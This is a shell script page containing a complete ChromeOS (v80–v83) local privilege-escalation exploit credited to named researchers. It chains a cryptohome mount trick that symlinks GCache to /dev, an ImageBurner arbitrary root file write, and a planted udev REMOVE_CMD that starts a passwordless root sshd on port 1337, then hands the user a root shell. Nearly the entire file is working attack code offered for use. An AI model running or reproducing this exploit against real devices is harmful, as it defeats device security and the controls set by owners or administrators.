-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path80.sh
93 lines (76 loc) · 2.87 KB
/
80.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
# privesc v80 hyperskid NO ARC NO SSHFS NO BINARIES
# made by Rory McNamara and OlyB, improved by rainestorme
# works on v80 through v83
# https://crbug.com/1072233 (udev command execution)
# https://crbug.com/1099390 (ImageBurner file write)
get_salty_username() {
dbus-send --system --print-reply --dest=org.chromium.Cryptohome /org/chromium/Cryptohome org.chromium.CryptohomeInterface.GetSanitizedUsername string:$1 | grep string | cut -d'"' -f2
}
dbus_pack_user() {
user=$1
packeduser=$(echo -n ${user} | hexdump -e '1/1 "0x%02x,"' -v | head -c -1)
packedlen=$(printf '%x' ${#user})
echo "0x${packedlen},${packeduser}"
}
stage_sshd() {
# set up a fake ssh server using the system sshd and enabling passwordless login for root with the provided key
if [ ! -e /tmp/ssh_host_rsa_key ]; then
ssh-keygen -f /tmp/ssh_host_rsa_key -N '' -t rsa >/dev/null
mkdir /tmp/root/
cp /tmp/ssh_host_rsa_key.pub /tmp/root/k
fi
cat > /tmp/sshd_config <<-EOF
AuthorizedKeysFile /tmp/%u/k
StrictModes no
HostKey /tmp/ssh_host_rsa_key
Port 1337
EOF
rm -f /home/chronos/user/.ssh/known_hosts
}
runasroot() {
ssh -p 1337 -i /tmp/ssh_host_rsa_key -o StrictHostKeyChecking=no [email protected] "$@"
}
MountEx() {
packeduser=$1
dbus-send --system --print-reply --dest=org.chromium.Cryptohome /org/chromium/Cryptohome org.chromium.CryptohomeInterface.MountEx \
array:byte:0x12,${packeduser} \
array:byte:0xa,0x16,0xa,0xe,0x8,0x0,0x1a,0xa,0x8,0x1,0x10,0x1,0x18,0x1,0x20,0x1,0x28,0x0,0x12,0x4,0x74,0x65,0x73,0x74 \
array:byte:0x8,0x0,0x12,0x12,0xa,0x10,0xa,0x8,0x8,0x0,0x12,0x4,0x74,0x65,0x73,0x74,0x12,0x4,0x74,0x65,0x73,0x74,0x20,0x0,0x30,0x0 >/dev/null
}
UnmountEx() {
dbus-send --system --print-reply --dest=org.chromium.Cryptohome /org/chromium/Cryptohome org.chromium.CryptohomeInterface.UnmountEx \
array:byte: >/dev/null
}
getdevaccess() {
packed=$(dbus_pack_user ${tgtuser})
gcache="/home/user/${salty_user}/GCache/v2"
MountEx ${packed}
rmdir ${gcache} 2>/dev/null
rm ${gcache} 2>/dev/null
ln -s /dev ${gcache}
UnmountEx
MountEx ${packed}
}
root_filewrite() {
tempfile="/home/chronos/u-${salty_user}/Downloads/filewrite"
echo $1 > ${tempfile}
ln -s $2 /dev/sdz
dbus-send --system --print-reply --dest=org.chromium.ImageBurner /org/chromium/ImageBurner org.chromium.ImageBurnerInterface.BurnImage string:${tempfile} string:/dev/sdz > /dev/null
sleep 0.5
rm /dev/sdz ${tempfile}
}
writefiles() {
root_filewrite "E:REMOVE_CMD=/bin/sh -c '/usr/sbin/sshd -f /tmp/sshd_config'" /run/udev/data/+pci\:0000\:00\:00.0
root_filewrite 1 /sys/devices/pci0000\:00/0000\:00\:00.0/remove
root_filewrite 1 /sys/devices/pci0000\:00/pci_bus/0000\:00/rescan
}
tgtuser=$(hexdump -e '1/8 "%02x\n"' -n 8 /dev/urandom)@test.test
salty_user="$(get_salty_username ${tgtuser})"
echo "Staging sshd..."
stage_sshd
echo "Getting /dev access..."
getdevaccess
echo "Writing files..."
writefiles
echo "Providing root shell..."
runasroot